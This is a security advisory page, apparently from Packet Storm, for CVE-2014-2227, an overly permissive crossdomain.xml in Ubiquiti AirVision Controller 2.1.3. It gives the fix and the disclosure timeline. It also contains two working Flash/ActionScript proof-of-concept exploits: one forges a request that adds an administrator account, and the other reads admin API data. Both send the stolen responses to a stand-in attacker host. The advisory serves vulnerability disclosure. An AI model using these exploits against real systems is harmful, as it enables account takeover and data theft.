Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSeth ArtPACKETSTORM:127617
HistoryJul 25, 2014 - 12:00 a.m.

Ubiquiti AirVision Controller 2.1.3 Weak Settings

2014-07-2500:00:00
Seth Art
packetstormsecurity.com
15

0.049 Low

EPSS

Percentile

92.8%

JSON
`-----------  
Vendor:  
-----------  
Ubiquiti Networks (http://www.ubnt.com/)  
  
----------------------------------------------  
Affected Products/Versions:  
----------------------------------------------  
AirVision Controller v2.1.3  
Note: Previous versions may be affected  
  
-----------------  
Description:  
-----------------  
Title: Overly Permissive default crossdomain.xml file  
CVE: CVE-2014-2227  
CWE: http://cwe.mitre.org/data/definitions/264.html  
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html  
Researcher: Seth Art - @sethsec  
  
------------------------------------------------------------------------------------------------------  
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:  
------------------------------------------------------------------------------------------------------  
  
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)  
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)  
// POC Template Author's github:  
(https://github.com/gursev/flash-xdomain-xploit)  
package {  
import flash.display.Sprite;  
import flash.events.*;  
import flash.net.URLRequestMethod;  
import flash.net.URLRequest;  
import flash.net.URLLoader;  
import flash.net.URLRequestHeader;  
  
public class XDomainXploit3 extends Sprite {  
public function XDomainXploit3() {  
// Target URL from where the data is to be retrieved  
var readFrom:String = "https//victim:7443/api/2.0/admin";  
var header:URLRequestHeader = new URLRequestHeader("Content-Type",  
"text/plain; charset=UTF-8");  
var readRequest:URLRequest = new URLRequest(readFrom);  
readRequest.method = URLRequestMethod.POST  
readRequest.data =  
"{\"name\":\"csrf-cdp\",\"email\":\"[email protected]\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";  
readRequest.requestHeaders.push(header);  
var getLoader:URLLoader = new URLLoader();  
getLoader.addEventListener(Event.COMPLETE, eventHandler);  
try {  
getLoader.load(readRequest);  
} catch (error:Error) {  
trace("Error loading URL: " + error);  
}  
}  
  
  
private function eventHandler(event:Event):void {  
// URL to which retrieved data is to be sent  
var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"  
var sendRequest:URLRequest = new URLRequest(sendTo);  
sendRequest.method = URLRequestMethod.POST;  
sendRequest.data = event.target.data;  
var sendLoader:URLLoader = new URLLoader();  
try {  
sendLoader.load(sendRequest);  
} catch (error:Error) {  
trace("Error loading URL: " + error);  
}  
}  
}  
}  
  
-----------------------------------------------------------------------  
POC #2: Using crossdomain.xml to exfiltrate log data:  
-----------------------------------------------------------------------  
  
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)  
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)  
// POC Template Author's github:  
(https://github.com/gursev/flash-xdomain-xploit)  
package {  
import flash.display.Sprite;  
import flash.events.*;  
import flash.net.URLRequestMethod;  
import flash.net.URLRequest;  
import flash.net.URLLoader;  
  
  
public class XDomainXploit extends Sprite {  
public function XDomainXploit() {  
// Target URL from where the data is to be retrieved  
var readFrom:String = "/victim:7443/api/2.0/admin";  
var readRequest:URLRequest = new URLRequest(readFrom);  
var getLoader:URLLoader = new URLLoader();  
getLoader.addEventListener(Event.COMPLETE, eventHandler);  
try {  
getLoader.load(readRequest);  
} catch (error:Error) {  
trace("Error loading URL: " + error);  
}  
}  
  
  
private function eventHandler(event:Event):void {  
// URL to which retrieved data is to be sent  
var sendTo:String = "http://www.malicious-site.com/admin"  
var sendRequest:URLRequest = new URLRequest(sendTo);  
sendRequest.method = URLRequestMethod.POST;  
sendRequest.data = event.target.data;  
var sendLoader:URLLoader = new URLLoader();  
try {  
sendLoader.load(sendRequest);  
} catch (error:Error) {  
trace("Error loading URL: " + error);  
}  
}  
}  
}  
  
-------------  
Solution:  
-------------  
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:  
The application name changed from AirVision to UniFi Video)  
  
-----------------------------  
Disclosure Timeline:  
-----------------------------  
  
2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product  
2014-02-19: Ubiquti confirms receipt of AirVision report and existence  
of the vulnerability  
2014-02-28: CVE-2014-2227 assigned  
2014-03-12: Requested status update  
2014-03-27: Requested status update  
2014-04-07: Requested status update  
2014-04-09: Ubiquiti provides timeline for solution  
2014-04-18: UniFi Video 3.0.1 is released  
2014-06-13: Set public disclosure date of 2014-07-24  
2014-07-24: Public disclosure  
  
  
`

Related

cve 1
cvelist 1
prion 1
nvd 1
cve
cve
CVE-2014-2227
2014-07-25 19:55:03
cvelist
cvelist
CVE-2014-2227
2014-07-25 19:00:00
prion
prion
Cross site scripting
2014-07-25 19:55:00
nvd
nvd
CVE-2014-2227
2014-07-25 19:55:03

0.049 Low

EPSS

Percentile

92.8%

JSON
Related for PACKETSTORM:127617
cve1cvelist1prion1nvd1